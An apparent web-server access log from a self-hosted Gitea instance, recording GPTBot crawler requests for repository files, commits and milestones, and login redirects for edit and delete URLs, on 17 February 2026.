+[17/Feb/2026:16:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 25697] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 55994] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11608] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 11187] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 12165] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:16:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14454] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:22:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:22:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:22:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:22:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14450] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14451] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 1442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:23:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:16:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11116] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 958] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:16:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 4444] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" +[17/Feb/2026:16:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:16:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:16:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8499] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastcomplete&state=closed" +[17/Feb/2026:16:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8507] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:16:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12776] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12785] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13905] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12987] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:23:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:16:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 19583] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 15946] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 12831] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 